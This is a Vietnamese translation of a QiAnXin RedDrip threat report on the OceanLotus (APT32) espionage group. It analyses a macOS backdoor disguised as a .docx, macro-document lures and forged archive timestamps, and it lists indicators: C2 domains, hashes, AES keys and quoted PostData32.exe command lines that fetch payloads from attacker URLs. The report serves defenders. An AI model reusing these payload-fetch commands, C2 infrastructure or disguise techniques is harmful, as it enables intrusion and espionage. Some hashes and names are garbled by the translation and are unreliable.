C28abdfe45590af0ef5c4e7a96d4b979	Trong 2018-08-15 s, 03:20:08	92672	DllHijack. .DLL
cf0b74fe79156694a2e3ea81e3bb1f85	Trong 2018-08-20 s, 02:12:34	92672	DllHijack. .DLL
C78FD680494B505525D706C285D5EBCE	Trong 2018-08-20 s, 02:23:12	92672	DllHijack. .DLL
77390c852addc3581d14acf06991982e	Trong 2018-08-29 s, 03:20:46	168960	DllHijack. .DLL
49e969a9312ee2ae639002716276073f	Trong 2018-08-29 s, 03:50:11	93184	DllHijack. .DLL
F5AD93917CD5B119F82B52A0D62F4A93	Trong 2018-08-30 s, 08:22:15	129536	DllHijack. .DLL
6291eabf6a8c58cad6a04879b7ba229f	Trong 2018-09-04 s, 02:24:06	92672	DllHijack. .DLL
9a10292157ac3748212fb77769873f6c	Trong 2018-09-04 s, 02:42:21	129536	DllHijack. .DLL
A406626173132C8bd6fe52672deacbe7	Trong 2018-09-06 s, 02:03:30	92672	DllHijack. .DLL
93c3d6cffdcb0a2f29844ff130a920be	Trong 2018-09-06 s, 08:01:41	129536	DllHijack. .DLL
6b8fc8c9fe4f4ef90b2fcbcc0d24cfc9	Trong 2018-09-10 s, 02:44:30	119296	DllHijack. .DLL
1211dea7b68129d48513662e546c6e21	Trong 2018-09-11 s, 03:06:50	92672	DllHijack. .DLL
2F1F8142D479A1DAF3CBD404C7C22F9F	Trong 2018-09-17 s, 04:12:57	111616	DllHijack. .DLL
0f877ad5464fcbb12e1c019adf7065cc	Trong 2018-09-18 s, 02:24:47	92672	DllHijack. .DLL
CAB262B84DBD319F3DF84F221E5C451F	Trong 2018-09-18 s, 03:00:51	111616	DllHijack. .DLL
07ff4f943b202f4e16c227679d9b598a	Trong 2018-09-19 s, 02:01:04	92672	DllHijack. .DLL
7a6ba3e26c86f3366f544f4553c9d00a	Trong 2018-09-24 s, 07:12:34	93184	DllHijack. .DLL
518f52aabd9a059d181bfe864097091e	Trong 2018-09-25 s, 02:59:04	111616	DllHijack. .DLL
70a64ae401c0a5f091b5382dea2432df	Trong 2018-10-03 s, 04:17:51	111616	DllHijack. .DLL
D40B4277E0D417E2E0CFF47458DDD62D	Trong 2018-10-09 s, 03:22:19	95232	DllHijack. .DLL
5f1bc795aa784f781d91acc97bec6644	Trong 2018-10-17 s, 08:02:50	209412	DllHijack. .DLL
305d992821740a9cbbda9b3a2b50a67c	Trong 2018-10-22 s, 03:27:24	92672	DllHijack. .DLL
7df61bc3a146fcf56fe1bbd3c26ea8c0	Trong 2018-10-22 s, 03:34:11	113664	DllHijack. .DLL
3c04352c5230b8cbaa12f262dc01d335	Trong 2018-11-14 s, 07:07:53	92672	DllHijack. .DLL
41f717eda9bc37de6ea584597f60521f	Trong 2018-11-15 s, 02:03:44	92672	DllHijack. .DLL
DB81A7E405822Be63634001EC0503620	Trong 2018-11-28 s, 08:55:24	112128	DllHijack. .DLL
865a7e3cd87b5bc5feec9d61313f2944	Trong 2018-11-29 s, 02:21:27	92672	DllHijack. .DLL
AAD445E7FFC5CE463996E5DB13350C5B	Trong 2018-11-29 s, 08:18:42	115712	DllHijack. .DLL
9bcd0b2590c53e4c0ed5614b127c6ba7	Trong 2018-11-29 s, 09:25:15	112128	DllHijack. .DLL
7338852de96796d7f733123f04dd1ae9	Trong 2018-12-04 s, 02:27:26	92672	DllHijack. .DLL
906a6898d099eb50c570a4014c1760f5	Trong 2018-12-04 s, 04:31:45	115712	DllHijack. .DLL
A530410BCA453C93B65D0DE465C428E4	Trong 2018-12-06 s, 03:21:22	115712	DllHijack. .DLL
de409b2fe935ca61066908a92e80be29	Trong 2018-12-10 s, 04:03:20	115712	DllHijack. .DLL
2756b2f6ba5bcf811c8baced5e98b79f	Trong 2018-12-10 s, 04:29:12	92672	DllHijack. .DLL

MAC Backdoor

Trong chương trước, chúng tôi thấy rằng IP đã phân giải là 198.15.119.125 sau khi thực hiện kiểm tra tên miền đảo ngược trên C2: rio.imbandaad.com được kết nối lại với mẫu MAC. Sau khi thực hiện kiểm tra ngược IP trên IP một lần nữa, chúng tôi thấy rằng một trong các tên miền web.dalalepredaa.com đã được đánh dấu bằng nhãn của OceanLotus.

Thông qua tên miền này, chúng tôi đã tìm thấy một mẫu MAC mới nhất của OceanLotus.

Đầu tiên, để ngụy trang thành tài liệu, mẫu đã thay đổi d trong docx ở trong tên thư mục thành một chữ số La Mã viết thường, qua đó đánh lừa người dùng: Don khieu nai.ⅾocx

Hệ thống Windows trông như thế này:

Trên hệ thống Macosx, nó trông giống như một tệp docx có biểu tượng văn phòng, nhưng thực ra nó là một thư mục:

Bởi vì iconFile trong info.plist trỏ đến iconFile của một tài liệu, như hình dưới đây:

Sau đây là thông tin chữ ký của mẫu, như thể hiện trong hình:

Identifier=com.apple.files Format=bundle with Mach-O thin (x86_64) CodeDirectory v=20200 size=439 flags=0x0(none) hashes=15+3 location=embedded Hash type=sha1 size=20 CDHash=80f54c13237d538cd3d885062e11c306b01d858f Signature size=8522 Authority=Developer ID Application: DAVID DOWELL (B5YH6VDVRE) Authority=Developer ID Certification Authority Authority=Apple Root CA Timestamp=Sep 19, 2018, 3:57:09 AM Info.plist entries=11 TeamIdentifier=B5YH6VDVRE Sealed Resources version=2 rules=12 files=2 Internal requirements count=1 size=208

Sau khi mẫu được thực thi, ba thư mục sẽ được tạo trong thư mục Thư viện:

LaunchAgents

Media

Video

Và cài đặt một ứng dụng có tên LaunchAgents để khởi động:

Chương trình của ứng dụng trỏ đến chương trình mediaagentd trong thư mục Video:

Ứng dụng trỏ đến chương trình mediaagentd trong thư mục Video:

Đồng thời, thư mục trước đó đã được thay thế bằng một tệp docx thực để đạt được khả năng tàng hình:

Chương trình mediaagentd đã phát hành được đóng gói và sẽ được tải và thực thi trong bộ nhớ sau khi giải mã:

Tệp MACOS đã giải nén như sau::

Tại đầu vào của tệp, sẽ có một vòng lặp vô tận while, sau khi thu thập thông tin máy tính và gửi nó, nó sẽ nhập vào chức năng vòng lặp điều khiển từ xa, ngủ trong trong một khoảng thời gian và tiếp tục lặp lại quy trình

Nhiều chuỗi nội bộ được mã hóa và hình dưới đây cho thấy chức năng mã hóa này được sử dụng ở đâu:

Phương pháp giải mã chủ yếu thông qua giải mã CCCrypt, thuật toán là aes và iv là 0, như trong hình:

Khóa AES (HEX) là 4E620ABEDAFB4D9866CC9D9C2D29E2D7EA18ADF1 không đủ cho phần đệm 0 32 bit:

Tất cả các chuỗi được giải mã như sau:

Và thông tin thu thập được sẽ được gửi qua thư viện CURL sau khi mã hóa AES:

Chức năng phân phối tin nhắn của điều khiển từ xa như sau: các hoạt động khác nhau sẽ được thực hiện theo mã thông báo riêng của nó ngay từ đầu. Sau đây là thao tác liệt kê thư mục:

Khóa dùng để truyền dữ liệu khác với khóa dùng để giải mã chuỗi giải mã, hình dưới đây minh họa khóa mã hóa để truyền dữ liệu: 07E74FF2CE9688C8F79B91AB32C95D11C140D3AC

Và một số thuật toán giải mã chuỗi sử dụng giải mã base64 trước, sau đó giải mã AES:

Nhưng base64 được sử dụng trong giải mã không phải là base64 tiêu chuẩn. Hình dưới đây cho thấy bảng base64 của mã độc:

Dữ liệu được mã hóa được gửi đến C2, như thể hiện trong hình dưới đây:

C2: web.dalalepredaa.com

Điều đáng chú ý là chúng tôi thấy rằng một số mẫu OceanLotus Mac gần đây có chữ ký, sau khi sao chép, chúng tôi thấy rằng có hai mẫu thường được sử dụng:

Melinda Cline (P74QRJXB2F)

DAVID DOWN (B5YH6VDVRE)

Tài liệu Office

Sau khi phân tích tương quan, nhận thấy rằng mẫu tài liệu vĩ mô có cùng nguồn gốc với một số lượng lớn mẫu.

Hình dưới đây là trường hợp so sánh, có thể thấy rằng nội dung của tài liệu được tạo ra cùng một lúc và bởi cùng một tác giả.

Hình bên dưới thể hiện đặc điểm của template, và tên file template rất đặc trưng của OceanLotus.

Sau khi phân tích, chúng tôi đã tổng hợp các tên tác giả thường được sử dụng trong các tài liệu tấn công của OceanLotus, trong đó hoạt động tấn công lớn nhất là hoạt động "DEV" và hoạt động "Tushar".

Sau khi phân tích tương quan của các kích thước khác nhau, có thể thu được tên tài liệu liên quan đến chuỗi hoạt động phân phối tài liệu macro độc hại này và giá trị Hash.

Tên tài liệu	MD5
Kiểm tra. Tài liệu	5 c9ef8b5263651a08ea1b79057a5ee28
Scan_Mau_Ao_Thun. Doc	B858C08CF7807E462CA335233BD83FE7
Tiếp thị nội dung Kaspersky. Doc	C313F8A5FD8CA391FC85193BC879AB02
Bác sĩ	473 FDFEFA92725099CA87E992EDBC92C
LY_ANH_TRUNG_CV. Tài liệu	02 cec2f17a7910b6fa994f340bbbc297
LÝ ANH TRUNG CV. Độc	dd5ae0c0a7e17d101f570812fec4e5e4
LY_ANH_TRUNG_CV. Tài liệu	90 E5ff68BF06CB930ED8C040139C4650
LY_ANH_TRUNG_CV. Tài liệu	6 DB450C4C756071ECAFFF425D6183D7D
CV - DucNguyenMinh. Doc	cb39e2138af92c32e53c97c0aa590d48
CV, Nguyễn Minh Đức. Tài liệu	8 E13895504E643CD8E0E87377B25BD6B
Danh sách cẩn thận vì phạm.doc	d3c27f779d615a1d3a35dff5e9561eb0
Danh sách Nhân viên Biển Thủ Tiến Công Ty. Tài liệu	27425360 D18feea54860420006ea9833
Danh sách Nhân viên Biển Thủ Tiến Công Ty. Tài liệu	CF0142DA12509F544A59093495C3A6DD
CV - AnthonyWei - Dịch vụ khách hàng. Tài liệu	B1DF440E5DD64FFAE9F7E792993F2F4C
	878 fa022bd5e5caf678fe8d728ce42ee
	F78Be074F6BC67A712E751254DF5F166
Hồ Chí Minh. Tài liệu	E2AED850C18449A43886FC79B342132F
DS - Thẻ - ChienThắng - TraVinh docx	74 B456ADF2AE708789FB2D34ECCCB954
Hợp Đông - XXX - TP - 092018. Tài liệu	72263750 df84e24fe645206a51772c88
BBLV_ASC_DG_092018. Tài liệu	3 A574C28BECA4F3C94D30E3CF3979F4C
Ấn Độ. Tài liệu	EE836E0F7A40571523BF56DBA59898F6
Danh sách các nhà đắt t ấc u tranh b ị b 2.9. Doc	F6068B672A19CE14981DF011A55081E4
1	00ac0d7337290b74bdd7f43ec4a67ddb

Sau khi phân tích tên mồi của các mẫu này, mỗi mẫu có những đặc điểm riêng

1. Tên mang tính chất chính trị: Danh sách các nhà hoạt động bị bắt

2. Bao gồm việc sử dụng sơ yếu lý lịch để thực hiện các cuộc tấn công lừa đảo

Nó có thể được liên kết với một email của OceanLotus bằng cách sử dụng sơ yếu lý lịch lừa đảo được phân tích bởi nhà nghiên cứu bảo mật @vupt_bka. https://twitter.com/vupt_bka/status/1083653486963638275

3. Ngoài ra còn có một số tài liệu hiển thị khởi động macro cảm ứng, không phù hợp với giao diện cảm ứng trước đó.

Và cũng có sự khác biệt về công nghệ giữa các mẫu lịch sử và các mẫu mới nhất, như được hiển thị bên dưới, một số mẫu lịch sử không sử dụng công nghệ chèn mẫu mà sử dụng phương thức thực thi mã macro trực tiếp và hiển thị mã sẽ được thực thi trong nội dung tài liệu, là mã macro OHN được đề cập trong phần phân tích mẫu.

Sau khi phân tích mối tương quan của các mẫu macro nêu trên, có thể thấy rằng kiểu tấn công này được tải lên lần đầu tiên ở Việt Nam vào năm 2017. Dựa vào tên tệp, có khả năng cao đây là một mẫu thử nghiệm.

MẪU 08_11__12_2017 (317)

c4d35f3263fef4a533e7403682a034c3

4. Loạt tài liệu mồi bằng tiếng Việt dưới dạng được bảo vệ xuất hiện nhiều nhất.

Nén tập tin 

Trong quá trình phân tích một mẫu Thu moi 2019.rar của OceanLotus, chúng tôi nhận thấy thời gian tạo mẫu này là đáng ngờ.

Dường như có một sự nghi ngờ về tự định nghĩa

Vì xét theo thời gian tải mẫu lên VT là ngày 1/3/2019 và khoảng cách thời gian trong gói nén quá lớn.

Do đó, sau khi chúng tôi thực hiện chụp liên kết vào thời điểm này, chúng tôi đã tìm thấy nhiều mẫu liên quan của OceanLotus.

Tên tệp	MD5
60982849 - C8E4-4039-8 F59 - DFB78D8BAB0D
15 F5ADF1-8798-49 BF - A6C3D90B69E B666-4	bcbc1bef20d2befdd290e31269e0174a
4052 D2E7 - CD4 CA42-4-8841-52 F782BBA411	dfaa343552e8d470096a0a09a018930f
Ffea6446 - e47 ab7a - 4 - b7ff - e461f9775177	9 B1ce9df321ce88ade4ff3b0ada5d414
5 D47E097 - C3BC - 401 - E - 8 C0F - E877280B368A	da14eece6191551a31d37d1e96681cd1
Thứ mới 2019. Rar	76289f02a0b31143d87d5e35839fb24a

Do đó, có thể khẳng định thêm rằng nhóm OceanLotus sẽ tùy chỉnh thời gian tạo mẫu và tạo hàng loạt mẫu để giao hàng.

Kết thúc

Báo cáo này bao gồm một số lượng lớn các cuộc tấn công vào các quốc gia ở Đông Nam Á và các nguồn lực được sử dụng bởi Nhóm OceanLotus, tiết lộ lịch sử tấn công không bao giờ kết thúc, phạm vi mục tiêu tấn công cực kỳ rộng và các phương pháp kỹ thuật rất sáng tạo. Trong các cuộc tấn công, nhóm luôn thay đổi mồi nhử, tải trọng, kỹ thuật né tránh AV, thậm chí cả tài sản tên miền cũng không ngừng phát triển, thể hiện khả năng chiến đấu và tấn công ý chí rất mạnh.

Do đó, khi chúng tôi theo dõi các hoạt động tấn công của OceanLotus chống lại Trung Quốc, chúng tôi phân tích TTP thể hiện trong các cuộc tấn công của OceanLotus chống lại các thực thể khác để hiểu sâu hơn về chúng và tiếp tục thực hiện đối đầu có chủ đích.

IOC

Tên miền:

syn.servebbs.com

word.webhop.info

beta.officopedia.com

outlook.updateoffices.net

outlook.betamedias.com

outlook.officebetas.com

office.allsafebrowsing.com

open.betaoffice.net

cortanazone.com

b.cortanazone.com

cortanasyn.com

api.blogdns.com

dominikmagoffin.com

blog.artinhauvin.com

worker.baraeme.com

kingsoftcdn.com

style.fontstaticloader.com

plan.evillese.com

bluesky2018man.com

enum.arkoorr.com

background.ristians.com

pong.dynathome.net

zone.servehttp.com

cdn.eworldship-news.com

api.blogdns.com

online.stienollmache.xyz

image.fontstaticloader.com

mappingpotentials.com

vnbizcom.com

cdn3.onlinesurveygorilla.com

eworldship-news.com

enormousamuses.com

163mailservice.com

stackbio.com

mailserviceactivation.com

web.dalalepredaa.com

rio.imbandaad.com

p12.alerentice.com

Tập tin mồi

FD128B9F0CBDC374227CF5564371AAC

4a0144c7436e3ff67cf2d935d82d1743

4c30e792218d5526f6499d235448bdd9

d8a5a375da7798be781cf3ea689ae7ab

2d3fb8d5b4cefc9660d98e0ad46ff91a

89e3f31c6261f4725b891c8fd29049c9

7b0e819bd8304773c3648ab03c9f182a

c4d35f3263fef4a533e7403682a034c3

B1DF440E5DD64FFAE9F7E792993F2F4C

A76Be0181705809898D5D7D9AED86ee8

2785311085b6ca782b476d9c2530259c

60501717f81eacd54facecf3ebadc306

3d7cd531d17799832e262eb7995abde6

C7931FA4C144C1C4DC19AD4C41C1E17F

Các tập tin tương quan:

5c9ef8b5263651a08ea1b79057a5ee28

B858C08CF7807E462CA335233BD83FE7

C313F8A5FD8CA391FC85193BC879AB02

473fdfefa92725099ca87e992edbc92c

02cec2f17a7910b6fa994f340bbbc297

dd5ae0c0a7e17d101f570812fec4e5e4

90e5ff68bf06cb930ed8c040139c4650

6db450c4c756071ecafff425d6183d7d

cb39e2138af92c32e53c97c0aa590d48

8E13895504E643CD8E0E87377B25BD6B

d3c27f779d615a1d3a35dff5e9561eb0

27425360d18feea54860420006ea9833

CF0142DA12509F544A59093495C3A6DD

B1DF440E5DD64FFAE9F7E792993F2F4C

878fa022bd5e5caf678fe8d728ce42ee

F78Be074F6BC67A712E751254DF5F166

E2AED850C18449A43886FC79B342132F

74b456adf2ae708789fb2d34ecccb954

72263750df84e24fe645206a51772c88

3a574c28beca4f3c94d30e3cf3979f4c

EE836E0F7A40571523BF56DBA59898F6

F6068B672A19CE14981DF011A55081E4

00ac0d7337290b74bdd7f43ec4a67ddb

Các tệp PE tương quan:

2f9af6b9d73218c578653d6d9bd02d4d

C9D29501410E19938CD8E01630DC677B

Địa chỉ:

http[:]//download-attachments.s3.amazonaws.com/db08b565038ac83e89e7b55201479f37ea49e525/f0c6ea8e-d2f8-445f-b649-57808b2015b7

Đặc điểm mẫu

ZA:\Code\Macro_NB2\Request\PostData32.exe -u https://word.webhop.info/blak32.gif -t 200000

ZA:\Code\Macro_NB2\Request\PostData32.exe -u https://syn.servebbs.com/kuss32.gif -t 200000

UA:\Code\Nb2VBS\Request\PostData32.exe -u https://ristineho.com/threex32.png -t 60000

XA:\Code\Macro_NB2\Request\PostData32.exe -u https://cortanasyn.com/kirr32.png -t 200000

C:\Users\WIN7UTL64\Desktop\Macro_NB2_new\Request\PostData32.exe

{C:\Users\WIN7UTL64\Desktop\Macro_NB2_new\Request\PostData32.exe -u https://office.allsafebrowsing.com/fdsw32.png -t 240000

SecurityAndMaintenance_Error.bin

d:\work\malware\vinacap\SecurityAndMaintenance_Error.png

d:\work\forensics\vinacap\dfir\nhule\files\SecurityAndMaintenance_Error.png

D:\work\forensics\vinacap\DFIR\Nhule\files\SecurityAndMaintenance_Error.png

Chữ ký MAC:

Melinda Cline (P74QRJXB2F)

DAVID DOWELL (B5YH6VDVRE)

KHÓA AES:

Chuỗi được giải mã	4E620ABEDAFB4D9866CC9D9C2D29E2D7EA18ADF1
Gói được mã hóa	07E74FF2CE9688C8F79B91AB32C95D11C140D3AC

Tham khảo

[1] https://ti.qianxin.com/blog/articles/oceanlotus-targets-chinese-university/

[2] https://twitter.com/blackorbird/status/1118399331688570880

[3] https://medium.com/@sp1d3rm4n/apt32-oceanlotus-m%E1%BB%99t-chi%E1%BA%BFn-d%E1%BB%8Bch-apt-b%C3%A0i-b%E1%BA%A3n-nh%C6%B0-th%E1%BA%BF-n%C3%A0o-ph%E1%BA%A7n-2-119a24585d9a

[4] https://twitter.com/blackorbird/status/1086186184768815104

[5] https://twitter.com/RedDrip7/status/1119204830633848834

Phụ lục

Đội RedDrip

RedDrip Team của QiAnXin (Formly SkyEye Team), được thành lập vào năm 2015, tập trung vào nghiên cứu các cuộc tấn công APT. Là đội đầu tiên tiết lộ cuộc tấn công OceanLotus (APT-C-00), RedDrip Team cũng là một phần quan trọng của Trung tâm Tình báo Mối đe dọa QiAnXin.

Nhóm của chúng tôi có các nhà phân tích, nhà phát triển bảo mật, bao gồm toàn bộ chu kỳ hoạt động thông tin về mối đe dọa: tìm nguồn cung ứng dữ liệu, xử lý, phân tích và tương quan. Thông tin về mối đe dọa của chúng tôi hỗ trợ các sản phẩm QiAnXin và các sản phẩm của bên thứ ba.

Dựa vào năng lực dữ liệu bảo mật hàng đầu và chuyên môn bảo mật, chúng tôi đã tìm thấy một số chiến dịch APT đáng chú ý, bao gồm OceanLotus.

Theo dõi chúng tôi trong WeChat

Bài viết được dịch bởi MT's Blog.

Bài gốc